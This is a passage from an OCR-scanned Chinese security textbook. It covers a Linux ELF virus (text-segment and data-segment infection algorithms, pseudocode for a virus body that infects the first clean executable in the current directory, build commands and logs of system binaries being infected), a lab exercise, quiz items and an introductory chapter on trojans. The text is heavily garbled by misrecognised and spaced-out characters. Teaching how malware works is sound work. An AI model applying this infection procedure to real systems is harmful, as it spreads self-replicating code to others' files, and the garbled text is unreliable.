(5) 对 于 文本 段 之 后 的 phdr: 增加 p_offset 加 上 PAGESIZE 大 小 。 

(6) 对 于 那些 因 插 入 寄生 代码 而 影响 偏 移 的 每 个 节 的 shdr: 增加 sh_offset 加 上 
PAGESIZE 大 小 。 

(7) 在 文件 中 物理 地 插入 寄生 代码 ,并 且 填 充 到 一 个 页 大 小 。 位 置 处 于 文本 段 的 p_ 
offset 加 上 原来 的 p_filesz 的 偶 移 位 置 。 

第 二 种 算法 是 数据 段 后 填充 病毒 感染 ,具体 步骤 如 下 。 

(1) 修改 病毒 代码 ,使 病毒 代码 执行 后 能 够 跳 转 到 原来 的 入口 点 。 

(2) 定位 数据 段 : 修改 ELF 头 中 的 入口 点 , 指 回 新 的 代码 , 即 数 据 段 末尾 处 (p_vaddr 十 
p_memsz); 修改 e_shoff 字段 指 回 新 的 节 头 表 偶 移 量 , 即 原 来 的 加 上 加 入 的 病毒 大 小 和 bss 
段 大 小 。 

(3) 对 于 数据 段 程序 头 : 增加 p_filesz 用 来 包括 新 的 代码 和 . bss 节 ; 增加 p_memsz 包 
含 新 的 代码 ; 计算 . bss 节 的 大 小 (p_memsz-p_filesz) 。 

(4) 对 于 任何 一 个 搬入 点 之 后 节 的 节 头 shdr: 增加 sh_offset ,增加 数值 为 病毒 大 小 与 . 
bss 市 大 小 的 和 。 

(5) 物理 地 插入 病毒 代码 到 文件 中 : 移动 节 头 表 以 及 其 他 两 个 不 属于 任何 段 的 节 。 

目标 选择 算法 很 简单 ,就 是 谈 取 当前 目录 ,然后 读 取 第 一 个 未 被 感染 的 可 执行 ELF 文 
件 来 感染 ,没有 用 到 随机 算法 ,这 将 是 本 病毒 未 来 的 扩展 。 

感染 方法 选择 算法 也 是 很 简单 的 ,在 感染 融 执 行 中 ,对 第 一 个 宿主 进行 感染 可 以 进 
行 手 工 选 择 ,在 病毒 体 执 行 过 程 中 ,目前 实现 的 病毒 对 两 种 方法 的 选择 规则 是 ,首先 优先 
使 用 文本 段 之 后 填充 区 感染 的 方法 ,如 果 填 充 区 比 病 毒 的 体 
积 小 , 则 上 月 动 切换 到 使 用 数据 段 之 后 填充 病毒 的 方法 。 可 以 初始 化 模块 
在 以 后 的 设计 中 增加 一 个 随机 也 数 来 随机 确定 使 用 哪 一 种 
方法 进行 感染 ,这 样 更 能 提高 病毒 的 隐蔽 性 和 查 杀 病毒 的 - 

程序 头 表 处 
难度 。 理 模块 

3. 流程 图 

这 里 只 介绍 病毒 体 程序 的 流程 图 ,感染 器 程序 流程 图 与 病 
毒 体 流程 图 类 似 ,只 是 可 以 自 定义 感染 方法 而 已 ,在 此 不 做 
介绍 。 

病毒 体 程序 实现 可 以 分 为 4 个 模块 ,分 别 为 初始 化 模块 、 收尾 模块 
程序 头 表 处 理 模 块 . 节 头 表 处 理 模块 以 及 收尾 模块 ,如 图 4-3 一 
图 4-6 所 示 。 4-3 ”病毒 体 流 程 图 
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读 取 插入 点 之 后 
的 数据 到 Data 数 
组 中 


保存 寄存 右 


读 取 当前 目录 
下 的 合适 文件 


写 人 bss 大 小 的 
填充 


写 人 病毒 体 


是 否 使 用 数据 
段 感染 方法 


读 取 内 存 映 
像 中 的 病 姆 
体 代码 


写 人 填充 至 
PAGESIZE 大 小 的 
病毒 体 


将 Data 数 组 内 容 
写 回 文件 
恢复 寄存 器 


4-4 初始 模块 和 收尾 模块 流程 图 


根据 数据 段 感染 读 取 文 件 头 表 
修改 相关 字段 表 项 


i 是 否 病毒 太 大 是 否 文本 自 


根据 文本 段 感 染 
修改 相关 字段 


将 ELF 头 和 程序 
头 表 写 回 文件 


4-5 ”程序 头 表 处 理 模块 流程 图 
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谈 取 三 头 表 表 项 


sh_offset 增 加 
VIRUSSIZE+ 
bss_size 


sh_offset 增 加 
PAGESIZE 修 
订 文 本 段 size 


是 否 节 头 表 
最 后 一 项 


将 攻 头 表 内 容 写 回 
文件 


4-6 节 头 表 处 理 模块 流程 图 


4. 实现 过 程 的 伪 代 码 说 明 


void virus(void) 


{ 


__asm _ volatile (保存 寄存 器 信息 , 即 保存 除去 esp 以 外 其 他 7 个 通用 寄存 器 ); 
打开 当前 目录 ".", 准 备 读 取 当前 目录 下 文件 信息 
_asm__ volatile (获取 病毒 体 的 起 始 虚拟 地 址 ); 

读 取 当前 目录 第 一 个 文件 


while( 循 环 检查 当前 文件 是 否 为 未 被 感染 的 可 执行 ELF 文件 ) 


if( 是 ) break; 
else 


读 取 下 一 个 文件 信息 


} 
< 病毒 体 演 示 打 印 的 内 容 > 
读 取 文件 ELF 头 
char Virus[ PAGESIZE ] ; 
利用 memcpy 获得 病毒 , 存 人 数组 Virus 中 
修订 病毒 体 使 其 能 够 跳 转 到 原来 的 和 人口 点 
处 理 程序 头 表 
for( 循 环 读 取 程序 头 表 中 表 项 ) 
{ 
if( 如 果 为 文本 段 之 后 的 段 并 且 使 用 文本 段 后 填充 方法 感染 ) 
{ 
p_offset 增 大 PAGESIZE 大 小 ; 
} 
else if( 类 型 为 PT_LOAD) 
{ 
if( 是 数据 段 且 使 用 数据 段 之 后 插入 方法 感染 ) 
{ 
根据 该 感染 算法 修改 ELF 头 以 及 数据 段 程序 头 中 的 各 种 相关 信息 


} 
else if( 为 文本 段 ) 
{ 
if (病毒 体 太 大 了 超过 可 填充 大 小 ) 
{ 
使 用 数据 段 感染 方法 


else 


使 用 文本 段 后 填充 感染 方法 
根据 该 感染 算法 修改 ELF 头 以 及 文本 段 程序 头 中 的 各 种 相关 信息 
} 
} 


} 
读 取 下 一 个 段 的 程序 头 
} 
分 别 将 ELF 头 和 程序 头 表 写 回 文件 
处 理 节 头 表 
for( 循 环 读 取 节 头 表 中 表 项 ) 
{ 
if (插入 点 之 后 各 节 ) 
{ 
if( 使 用 数据 段 感染 ) 
{ 
sh_offset 增 大 (VIRUS_SIZE + bss_size) ; 
} 
else if( 使 用 文本 段 填充 感染 ) 
{ 
if( 文 本 段 最 后 一 节 ) 
{ 
修订 该 节 头 字段 sh_size 
} 
else 
sh_offset 增 大 PAGESIZE 大 小 ; 
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} 
} 
读 取 下 一 个 节 头 表 项 ; 


} 
节 头 表 写 回 文件 
获取 文件 大 小 
读 取 插 入 点 之 后 内 容 到 Data 数组 中 
if( 使 用 数据 段 感 染 方法 ) 
{ 
写 人 .bss 大 小 的 填充 ,然后 写 和 人 病毒 体 


else 
{ 
写 人 病毒 体 并 填充 至 PAGESIZE 大 小 


} 

将 Data 数组 内 容 写 回 文件 

out: asm _ volatile (恢复 寄存 器 内 容 并 设置 跳 转 指令 ) ; 
} 

void virus end(void){virus();} 


标志 病毒 体 结束 的 函数 ,用 来 修复 VIRUS_SIZE 宏 定 义 


5. 感染 过 程 实例 

完成 了 所 有 编程 工作 后 就 需要 对 病毒 体 进行 实例 测试 了 ,看 是 否 完成 预期 的 目标 。 

在 一 个 新 的 环境 中 ,编译 病毒 体 的 过 程 是 很 简单 的 ,基本 上 需要 修订 的 工作 都 由 bash 
脚本 完成 。 

在 病毒 体 源码 所 在 工作 目录 下 ,编译 过 程 如 下 。 

(1) 执行 命令 make all。 

(2) 执行 命令 chmod a 十 x . /get_patch. sh。 

(3) 执行 命令 . /get_patch. sh 。 

(4) 执行 命令 make clean && make all。 

上 述 一 系列 命令 都 被 写 和 人 脚本 install. sh, 所 以 可 以 选择 执行 . /install. sh 就 可 以 得 到 
含有 病毒 体 的 感染 帮 ELF 可 执行 文件 infect。 关 于 get_patch. sh 脚本 中 完成 的 工作 主要 是 
对 两 个 宏 定 义 进行 修订 ,因为 不 同 的 环境 不 同 的 编 详 需 会 导致 这 两 个 宏 定 义 不 同 ,所 以 需要 
每 次 单独 修订 ,然后 再 重新 编译 。 这 个 脚本 中 的 内 容 可 以 参考 上 一 节 技 术 汇 总 中 的 内 容 。 
编译 过 程 如 下 。 


[root@project homework]# make all 

gcc Virus.c -c -fomit-frame-pointer -Wall -oO Virus.o 

Virus.c: In function 似 irus?p 

Virus.c:95: warning: passing argument 2 of 人 鲜 rite?makes pointer from inteder without a cast:t 
gcc infector.c virus.o0 -0 infect -Wall 

[root@project homework]# ./get patch.sh 

VIRUS SIZE= 2895 

JMP OFFSET= 2336 

[root@project homework]# make clean 

rm -f virus.o infect 

[root@project homework]# make all 

gcc Virus.c -C -fomit-frame-pointer -Wall -oO Virus.o 

Virus.c: In function 饼 jrus?p 

Virus.c:95: warning: passing argument 2 of 鲜 rite?makes pointer from integer without a cast:t 
gcc infector.c Virus.o -0 infect -Wall 

[root@proiject homework]+# 
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测试 过 程 : 由 于 本 病毒 并 没有 什么 实际 危害 ,只 是 一 个 演示 版 本 ,因此 感染 后 的 宿主 表 
现 为 在 打印 目 喘 的 输出 结果 前 先 打印 E、L、F 这 3 个 字母 。 
宿主 文件 病毒 首先 使 用 infect 进行 感染 ,复制 /bin/df 到 当前 的 目录 ,并 进行 两 个 复制 ， 
分 别 复制 为 textl 和 datal 两 个 文件 ,分 别 进行 对 文本 段 填充 感染 和 数据 段 后 感染 。 


[root@project homework]# cp /bin/df ./ 
[root@project homework]# ./df 
Filesystem l1K-blocks Used Available Uses Mounted on 
/dev/mapper/VolGroup00-LogVvol00 

4412028 1771504 2412788 43% / 
/dev/sdal 101086 10894 4973 0 2 BonkE 
tmpfs 48472 0 48472 0% /dev/shm 
[root@project homework]# ./infect df 
Usage : infect <ELF filename> [OPTION] 
OPTIONS: --text : Insert virus code to text segment padding. 

--data : Insert virus code after data segment. 

[root@project homework]# cp df textl 
[root@project homework]# cp df datal 
[root@project homework]# ./infect textl --text 
[root@project homework]# ./infect datal --data 
[root@project homework]# ./textl 
ELFFilesystem l1K-blocks Used Available Uses Mounted on 
/dev/mapper/VolGroup00-LogVol00 

4412028 1771596 2412696 43% / 
/dev/sdal 101086 10894 84973 12% /boot 
tmpfs 48472 0 48472 0s /dev/shm 
[root@project homework]# 
[root@project homework]# ./datal 
ELFFijlesystem l1K-blocks Used Available Uses Mounted on 
/dev/mapper/VolGroup00-LogVvol00 

4412028 1771596 2412696 43% / 
/dev/sdal 101086 10894 84973 12% /boot 
tmpfs 48472 0 48472 0% /dev/shm 
[root@proiject homework]# 


可 以 发 现 两 个 文件 textl 和 datal 都 已 经 被 成 功 感 染 。 注 意 当 执 行 这 两 个 被 感染 文件 
时 ,当前 目录 将 会 有 文件 被 感染 。 有 可 能 是 文件 textl, 要 视 当 前 目录 内 可 执行 文件 名 称 
而 和 定 。 
创建 测试 目录 testl ,并 回 testl 目录 中 复制 /bin/df, 以 及 textl 文件 ,执行 textl ,并 观 
察 df 是 否 被 文本 段 填充 方式 感染 。 


[root@project homework]# mkdir testl 
[root@project homework]# cp /bin/df test1/ 
[root@project homework]# cp textl testl/test 
[root@project homework]# cd testi1/ 
[root@project test1]# 11 
total 100 
—rWXr-Xr-xX 1 root root 41476 May 9 21:22 df 
-rwWXIr-Xr-X 1 root root 45572 May 9 21:22 test 
[root@project testl]# ./test 
ELFFilesystem I blocks Used Available Uses Mounted on 
/dev/mapper/VolGroup00-LogVo100 
4412028 1771548 2412744 43% / 


/dev/sdal 101086 10894 84973 12% /boot 

tmpfs 48472 0 48472 0$ /dev/shm 
[root@project testl]# ./df 

ELFFilesystem lK-blocks Used Available Uses Mounted on 


/dev/mapper/VolGroup00-LogVol100 

4412028 1771548 2412744 43% / 
/dev/sdal 101086 10894 84973 12% /boot 
tmpfs 48472 0 48472 0% /dev/shm 


发 现 df 已 经 被 感染 ,对 比 df 感染 前 后 的 数据 段 信息 ,可 以 发 现 数据 段 的 偏 移 量 增 大 了 
0x1000 大 小 ,说明 感染 方法 是 文本 段 后 填充 感染 。 
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[root@project testl]# readelf -1 /bin/df |grep LOAD 
LOAD 0x000000 0x08048000 0x08048000 0x0992c 0x0992c R E 0x1000 
LOAD 0x00992c 0x0805292c 0x0805292c 0x0037c Ox004fc RW 0x1000 
[root@project testl]# 
[root@project testl]# readelf -1 ./df |grep LOAD 
LOAD 0x000000 0x08048000 0x08048000 0x0a47b 0x0a47b R E 0x1000 
LOAD 0x00a92c 0x0805292c 0x0805292c 0x0037c 0x004fc RW 0x1000 
[root@proiject testl]# 


创建 测试 目录 test2 ,并 回 test2 目录 中 复制 /bin/ls, 以 及 datal 文件 ,执行 datal ,并 观 
察 由 于 文本 段 后 填充 不 足 , 包 含 病 毒 体 的 1s 文件 是 否 被 数据 段 后 感染 方式 感染 。 


[root@project homework]# mkdir test2 
[root@project homework]# cp /bin/ls ./test2/ 
[root@project homework]# cp datal ./test2/test 
[root@project homework]# cd test2 
[root@project test2]# 11 
total 144 
Tarr Xr rooE TOG 9464 May 922244013 
-TWEL-XIE-X Lroot roOOL 44155 May 9 22.34 test 
[root@project test2]# 
[root@project test2]# ./test 
ELFFilesystem 1K-blocks Used Available Uses Mounted on 
/dev/mapper/VolGroup00-LogVo100 
4412028 1771696 2412596 43% / 
/dev/sdal 101086 10894 84973 12% /boot 
tmpfs 48472 0 48472 0% /dev/shm 
[root@project test2]# 
[root@project test2]# ./ls 
ELFl]Ss test 


说 明 ls 已 经 被 感染 了 ,对 比 1s 文件 感染 前 后 数据 段 和 文本 段 信息 ,发 现 数据 段 偏 移 并 
没有 改变 ,只 是 数据 段 的 大 小 改变 了 ,所 以 说 明 是 数据 段 后 填充 方法 进行 的 感染 。 


[root@project test2]# 
[root@project test2]# readelf -1 /bin/ls lgrep LOAD 
LOAD 0x000000 0x08048000 0x08048000 0xl4ef4 Oxl4ef4 R E 0x1000 
LORD 0x015000 0x0805d000 0x0805d000 0x0081c 0x00c50 RW 0x1000 
[root@project test2]# 
[root@project test2]# readelf -1 ./l1s lgrep LOAD 
LOAD 0x000000 0x08048000 0x08048000 0xl4ef4 0xl4ef4 R E 0x1000 
LOAD 0x015000 0xX0805d000 0x08059000 0x0179f 0x0179f RW 0x1000 
[root@project test2]# 


4.7 综合 实验 
综合 实验 三 : Linux ELF 病毒 实验 


【实验 目的 】 
(1) 了 解 Linux 感染 ELF 可 执行 文件 的 病毒 的 基本 编制 原理 。 
(2) 了 解 可 执行 文件 病毒 的 感染 、 破 坏 机 制 。 


【实验 环境 】 
Red Hat Linux 操作 系统 。 
【实验 步骤 】 


文件 位 置 : 本 书 配 套 素材 目录 \Experiment\LinuxELF。 该 目录 下 共 包 含 如 下 文件 。 
get_patch. sh: 用 来 修订 文件 中 两 个 宏 定 义 的 bash 脚本 文件 。 
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infector. c: 感染 器 程序 。 

infector. h: 感染 天 程序 的 头 文件 。 

Makefile: Makefile 文件 。 

virus. c: 病毒 体 的 源 文件 。 

virus. h: 病毒 体 头 文件 。 

(1) 复制 这 些 文件 到 Linux 系统 。 

(2) 修改 脚本 的 执行 属性 。 

(3) 创建 测试 用 可 执行 程序 ,根据 病毒 感染 能 力 , 注 意 测试 文件 的 属性 、 所 在 目录 层 
(4) 参考 4. 5 节 学 习 病 毒 原理 ,并 执行 病毒 ,观察 感染 过 程 。 

【实验 注意 事项 】 

(1) 本 病毒 程序 用 于 实验 目的 ,请 妥善 使 用 。 

(2) 本 病毒 程序 具有 一 定 的 破坏 力 ,做 实验 时 注意 安全 ,推荐 使 用 虚拟 机 环境 。 


4.8 习 是 


一 、 填 空 题 
1. Linux 可 执行 文件 的 前 4 个 字符 保存 一 个 魔术 数 (magic number) ,用 来 确定 该 文件 
是 否 为 的 目标 文件 。 
2. Linux 脚本 型 恶意 代码 的 核心 语句 (实现 自我 复制 的 语句 ) 是 
二 、 选 择 题 
1. 第 一 个 跨 Windows 和 Linux 平台 的 病毒 是 ( 
A. Lion B. W32. Winux 
C. Bliss D. Staog 
2. Linux 系统 下 的 欺骗 库 函 数 病 毒 使 用 了 Linux 系统 下 的 环境 变量 ,该 环境 变量 


是 ( ) 。 
A. GOT B. LD_LOAD 
C. PLT D. LD PRELOAD 
三 、 思 考题 
1. Linux 下 病毒 相对 较 少 ,这 是 由 什么 原因 造成 的 ?请 分 别 从 技术 角度 和 非 技 术 角 度 
探讨 。 
2. 简单 概括 Linux 下 病毒 的 种 类 。 
3. 简单 描述 感染 Linux ELF 格式 可 执行 文件 文本 段 的 主要 步骤 。 


、 实 操 题 

. 在 虚拟 机 上 安 狼 RedHat Linux 操作 系统 。 

. 擎 握 并 实践 Linux 操作 系统 下 的 Shell 恶意 脚本 。 

学 习 并 运行 感染 ELF 格式 可 执行 文件 的 原理 型 病毒 。 


了 瑟 


mm 
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古 希 脐 士 兵 藏 在 高 大 的 木马 中 潜入 特洛伊 城 ,采用 里 应 外 合 的 战术 一 举 占领 了 特洛伊 
城 。 现 在 所 讲 的 特洛伊 木马 侵入 远程 主机 的 方式 在 战术 上 与 古 希 脂 士 兵 的 攻 城 方式 相同 。 
通过 这 样 的 解释 相信 大 多 数 读者 对 木马 入 侵 主 机 的 方式 有 所 领悟 : 它 就 是 通过 某 些 手 段 潜 
入 对 方 的 计算 机 系统 ,并 以 种 种 隐蔽 方式 藏匿 在 系统 中 ; 系统 局 动 时 ,木马 上 月 动 在 后 台 隐 蔽 
运行 ; 最 终 , 这 种 程序 以 "里 应 外 合 ? 的 工作 方式 ,达到 控制 对 方 计 算 机 、 祝 取 关 键 信 息 等 
目的 。 

特洛伊 木马 和 传统 病毒 的 最 大 区 别 是 表现 欲望 不 强 ,通常 只 采取 守 取 的 手段 获取 信息 ， 
因此 ,受害 者 很 难 发 现 特洛伊 木马 的 踊 迹 。 即 使 在 反 病 毒 软件 日 益 强 大 的 今天 ,特洛伊 木马 
仍 是 非常 大 的 安全 隐患 。 绝 大 多 数 人 不 知道 木马 为 何 物 ,会 给 他 们 带 来 多 大 的 危害 ,所 以 他 
们 迄今 仍 不 停 地 从 不 可 信 的 站 点 下 载 可 能 捆绑 了 木马 的 文件 。 

本 章 将 介绍 木马 的 一 些 特征 、 木 马 入 侵 的 一 些 常 用 技术 ,以 及 防范 和 清除 方法 。 在 本 章 
的 最 后 ,还 对 几 款 常见 木马 程序 的 防范 经 验 作 了 较为 详细 的 说 明 。 

本 章 学 习 目 标 

(1) 掌握 特洛伊 木马 的 概念 。 

(2) 擎 握 木 马 开 发 实例 。 

(3) 擎 握 木 马 的 工作 流程 和 关键 技术 。 

(4) 掌握 木马 防范 方法 。 


5.1 基本 概念 


5.1.1 木马 概述 


木马 的 全 称 是 “特洛伊 木马 ?(Trojan Horse) ,得 名 于 原 荷 马 史 诗人 《伊利 亚 特 》 中 的 战争 
手段 。 在 网 络 安 全 领域 中 ,“ 特 洛 伊 木马 ”是 一 种 与 远程 计算 机 之 间 建 立 起 连接 ,使 远程 计算 
机 能 够 通过 网 络 控制 用 户 计算 机 系统 并 且 可 能 造成 用 户 的 信息 损失 .系统 损坏 甚至 次 痪 的 
程序 。 

一 个 完整 的 木马 系统 由 硬件 部 分 .软件 部 分 和 具体 连接 部 分 组 成 。 

(1) 硬件 部 分 。 建 立木 马 连 接 所 必需 的 硬件 实体 。 

JU 控制 端 ; 对 服务 端 进 行 远 程控 制 的 一 方 。 

G 服务 端 : 被 控制 端 远 程控 制 的 一 方 。 

G) Internet: 控制 端 对 服务 端 进行 迁 程 控制 ,数据 传输 的 网 络 载体 。 

(2) 软件 部 分 。 实 现 远程 控制 所 必需 的 软件 程序 。 

Q@ 控制 端 程序 : 控制 端 用 以 远程 控制 服务 端的 程序 。 

GO 木马 程序 : 潜入 服务 端 内 部 ,获取 其 操作 权限 的 程序 。 
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G) 木马 配置 程序 : 设置 木马 程序 的 端口 号 .触发 条 件 、 木马 名 称 等 ,并 使 其 在 服务 端 藏 
得 更 隐蔽 的 程序 。 

(3) 具体 连接 部 分 。 通 过 Internet 在 服务 端 和 控制 端 之 间 建 立 一 条 木马 通道 所 必需 的 
元 聚 。 
QO 控制 并 IP 和 服务 端 IP: 即 控制 端 和 服务 端的 网 络 地 址 ,也 是 木马 进行 数据 传输 的 
目的 地 。 

GO 控制 端 端口 和 木马 端口 : 即 控 制 端 和 服务 端的 数据 入 口 ,通过 这 个 人 口 ,数据 可 下 
达 控 制 端 程序 或 木马 程序 。 

木马 是 恶意 代码 的 一 种 , Back Orifice(BO)、Netspy、Picture、Netbus、Asylum 以 及 冰 
河 、 灰 饮 子 等 这 些 都 属于 木马 种 类 。 综 合 现在 流行 的 木马 程序 ,它们 都 有 以 下 基本 特征 。 

1. 欺骗 性 

为 了 诱惑 攻击 目标 运行 木马 程序 ,并 且 达 到 长 期 隐藏 在 被 控制 者 机 需 中 的 目的 ,特洛伊 
木马 采取 了 很 多 欺骗 手段 。 木 马 经 稼 使 用 类 似 于 篆 见 的 文件 名 或 扩展 名 (如 dll、win、sys、 
explorer) 的 名 称 , 或 者 仿制 一 些 不 易 被 人 区 别 的 文件 名 (如 字母 "1 与 数字 ”1” 字母 "o” 与 数 
字 “0”)。 它 通常 修改 系统 文件 中 的 这 些 难 以 分 辨 的 字符 ,更 有 苏 者 干脆 就 借用 系统 文件 中 
已 有 的 文件 名 ,只 不 过 保存 在 不 同 的 路 径 之 中 。 

还 有 的 木马 程序 为 了 欺骗 用 户 ,党 把 自己 设置 成 一 个 ZIP 文件 式 图 标 , 当 用 户 一 不 小 心 
打开 它 时 , 它 就 马上 运行 。 以 上 这 些 手 段 是 木马 程序 经 党 采用 的 ,当然 ,木马 程序 编制 者 也 
在 不 断 地 研究 发掘 新 的 方法 。 和 总 之 ,木马 程序 是 越 来 越 隐 蔽 、 越 来 越 专 业 , 所 以 有 人 称 木 马 
程序 为 “骗子 程序 ”。 

2. 隐蔽 性 

很 多 人 分 不 清 木 马 和 远程 控制 软件 ,木马 程序 是 驻 留 目 标 计 算 机 后 通过 远程 控制 功能 
控制 目标 计算 机 。 实 际 上 它们 两 者 的 最 大 区 别 就 在 于 是 否 隐蔽 起 来 。 例 如 ,PC Anywhere 
在 服务 副 端 运行 时 ,客户 问 与 服务 副 端 连接 成 功 后 客户 端 机 上 会 出 现 很 醒目 的 提示 标志 。 
而 木马 类 软件 的 服务 需 端 在 运行 的 时 候 应 用 各 种 手段 隐藏 上 月 己 ,不 可 能 出 现 什么 提示 ,这 些 
黑客 们 早 就 想到 了 方方面面 可 能 发 生 的 迹象 ,把 它们 隐藏 。 木 马 的 隐蔽 性 主要 体现 在 以 下 
两 个 方面 。 

(1) 木马 程序 不 产生 图 标 。 它 虽然 在 系统 局 动 时 会 目 动 运行 ,但 它 不 会 在 "任务 栏 ? 中 
产生 一 个 图 标 ,防止 被 发 现 。 

(2) 木马 程序 不 出 现在 任务 管理 硕 中 。 它 月 动 在 任务 管理 融 中 隐藏 ,并 以 "系统 服务 ” 
的 方式 欺骗 操作 系统 。 

3. 自动 运行 性 

木马 程序 是 一 个 系统 启动 时 即 自 动 运行 的 程序 ,所 以 它 可 能 潜入 在 启动 配置 文件 (如 
win. ini、system. ini、winstart. bat 等 ) ,启动 组 或 注册 表 中 。 

4. 自动 恢复 功能 


现在 很 多 木马 程序 中 的 功能 模块 已 不 再 由 单一 的 文件 组 成 ,而 是 将 文件 分 别 存储 在 不 
同 的 位 置 。 最 重要 的 是 ,这 些 分 散 的 文件 可 以 相互 恢复 ,以 提高 存活 能 力 。 
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5. 功能 的 特殊 性 

一 般 来 说 ,木马 的 功能 都 是 十 分 特殊 的 ,除了 普通 的 文件 操作 以 外 ,还 有 些 木 马 具 有 搜 
索 缓 存 中 的 口令 .设置 口令 .扫描 目标 计算 机 的 IP 地 址 、 进 行 键盘 记录 、 远 程 注册 表 的 操作 
以 及 锁定 鼠标 等 功能 。 


5.1.2 木马 的 分 类 


根据 木马 程序 对 计算 机 的 具体 控制 和 操作 方式 ,可 以 把 现 有 的 木马 程序 分 为 以 下 几 类 。 

1. 远程 控制 型 木马 

远程 控制 型 木马 是 现在 最 流行 的 木马 。 每 个 人 都 想 有 这 样 的 木马 ,因为 它们 可 以 使 控 
制 者 方便 地 想 访问 受害 人 的 硬盘。 远程 控制 木马 可 以 使 远程 控制 者 在 宿主 计算 机 上 做 任意 
的 事情 。 这 种 类 型 的 木马 有 著名 的 BO 和 “冰河 ”等 。 

2. 发 送 密 码 型 木马 

发 送 密码 型 木马 的 目的 是 为 了 得 到 缓存 的 密码 ,然后 将 它们 送 到 特定 的 E-mail 地 址 。 
这 种 木马 的 绝 大 多 数 在 Windows 每 次 加 载 时 上 月 动 加 载 ,使 用 25 号 端口 发 送 邮 件 。 也 有 一 
些 木 马 发 送 其 他 的 信息 ,如 ICQ 相关 信息 等 。 如 果 用 户 有 任何 密码 缓存 在 计算 机 的 某 些 地 
方 , 这 些 木 马 将 会 对 用 户 造 成 威胁 。 

3. 键盘 记录 型 木马 

键盘 记录 型 木马 的 动作 非 稼 简单 ,它们 唯一 做 的 事情 就 是 记录 受害 人 在 键盘 上 的 敲 击 ， 
然后 在 日 志文 件 中 检查 密码 。 在 大 多 数 情况 下 ,这 些 木 马 在 Windows 每 次 重启 的 时 候 加 
载 ,它们 有 “在 线 ” 和 “下 线 ” 两 种 选项 。 当 用 “在 线 ” 选 项 的 时 候 , 它 们 知道 受害 人 在 线 , 会 记 
录 每 一 件 事情 。 当 用 “下 线 ” 选 项 的 时 候 , 受 害 人 做 的 每 一 件 事 情 会 被 记录 并 保存 在 受害 人 
的 人 硬盘 中 等 待 传送 。 

4. 毁坏 型 木马 

毁坏 型 木马 的 唯一 功能 是 毁坏 和 删除 文件 ,使 得 它们 非常 简单 易 用 。 它 们 能 和 目 动 删 除 
计算 机 上 所 有 的 DLL、EXE 以 及 INI 文 件 。 这 是 一 种 非常 危险 的 木马 ,一 旦 被 感染 ,如 果 文 
件 没有 备份 , 毫 无 疑问 ,计算 机 上 的 某 些 信 息 将 永远 不 复 存 在 。 

5. FTP 型 木马 

FTP 型 木马 在 计算 机 系统 中 打开 21 号 端口 ,让 任何 有 FTP 客户 软件 的 人 都 可 以 在 不 
用 密码 的 情况 下 连 上 别人 的 计算 机 并 自由 上 传 和 和 下载。 


5.1.3 远程 控制 木马 与 病毒 


远程 控制 软件 可 以 为 网 络 管理 做 很 多 工作 ,以 保证 网 络 和 计算 机 操作 系统 的 安全 。 这 
类 程序 的 监听 功能 也 是 为 了 保证 网 络 的 安全 而 设计 的 。 木 马 在 技术 上 和 远程 控制 软件 基本 
相似 。 它 们 最 大 的 区 别 就 是 木马 具有 隐蔽 性 而 远程 控制 软件 没有 。 例 如 ,国内 的 血 蜂 蛛 , 国 
外 的 PC Anywhere 等 都 是 远程 控制 软件 ,这 些 软件 的 服务 硕 端 在 目标 计算 机 上 运行 时 , 目 
标 计 算 机 上 会 出 现 很 醒目 的 标志 。 木 马 类 软件 的 服务 融 端 在 运行 的 时 候 应 用 各 种 手段 隐藏 
自己 。 
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从 计算 机 病毒 的 定义 和 特征 可 以 看 出 ,木马 程序 与 病毒 有 十 分 明显 的 区 别 。 最 基本 的 
区 别 就 在 于 病毒 有 很 强 的 传染 性 ,而 木马 程序 却 没有 。 本 马 不 能 目 行 传播 ,而 是 依 徘 香 主 以 
其 他 假象 来 冒充 一 个 正常 的 程序 。 由 于 技术 的 综合 利用 ,当前 的 病毒 和 木马 已 经 融合 在 一 
起 。 例 如 ,著名 的 木马 程序 YAI 由 于 其 中 采用 了 病毒 技术 , 差 一 点 就 成 了 第 二 个 CIH 病 
毒 。 反 过 来 ,计算 机 病毒 也 在 向 木 马 程 序 靠 近 , 以 便 使 自己 具有 远程 控制 功能 。 例 如 ,“ 红 色 
代码 ”病毒 已 经 具有 木马 的 远程 控制 功能 。 


5.1.4 木马 的 工作 流程 


木马 从 制造 出 来 ,到 形成 破坏 ,要 经 历 很 多 阶段 。 如 图 5-1 所 示 ,木马 的 生命 流程 大 致 
为 : 木马 的 植 人 (中 木马 ) 阶 段 、 木马 的 首次 运行 \ 木 马 与 控制 端的 通道 建立 数据 交互 (木马 
使 用 ) 阶 段 。 

(1) 木马 的 植 和 人 阶段 : 该 阶段 的 主要 工作 是 设法 把 木马 放置 在 目标 机 器 上 ,来 实现 对 
目标 机 需 的 控制 。 由 于 该 阶段 很 像 把 木马 这 粒 种 子 撒 向 目标 机 群 , 因 此 被 形象 地 称 为 “ 植 
入 ”。 如 图 5-1(a) 所 示 , 编 制 好 的 木马 可 以 通过 E-mail、IM(QQ、 微 信 )、 网 络 服 务 (Web、 
FTP、BBS 等 ) 恶意 代码 (Worm、Virus 等 ) ,存储 介质 (磁盘 或 U 盘 ) 等 手段 ,经 过 互联 网 植 
和 到 受害 主机 上 。 


(1) E-mail 
(1) E-mail 
(2) IM 
目标 了 - 
3) 网 络 服务 (2) 六 口 扫描 
主机 ee 
(4) 恶意 代码 G) 其 他 网 络 通知 
(5) 存储 介质 
(a) 植 人 阶段 (b) 首次 握手 
1) 配置 参数 ; 
TS 命令 \ 数 据 
(2) 啊 应 参数 庙 
(c) 通道 配置 和 建立 (d) 使 用 阶段 


5-1 木马 的 工作 流程 


植 人 阶段 还 有 一 个 非常 重要 的 工作 就 是 木马 的 首次 运行 。 木 马 的 首次 运行 大 多 依 徘 社 
会 工程 等 欺骗 手段 ,引诱 或 欺骗 用 户 触发 茶 个 动作 。 经 过 首次 运行 后 ,木马 就 建立 起 了 晶 已 
的 局 动 方 式 。 

经 过 第 一 阶段 以 后 ,尽管 木马 在 目标 机 带 上 已 经 运行 起 来 ,但 控制 端 还 不 知道 木马 究竟 
在 哪 一 台 受 害 机 带 上 ,也 就 是 说 这 个 时 候 的 木马 还 处 于 日 由 状态 。 

(2) 木马 的 首次 握手 : 如 图 5-1(b) 所 示 , 木 马 经 过 首次 握手 建立 与 控制 端的 联系 。 该 阶 
段 一 般 有 两 种 技术 : 一 种 是 木马 主动 和 控制 端 联系 (例如 ,木马 运行 后 可 以 主动 发 所 mail 给 控 
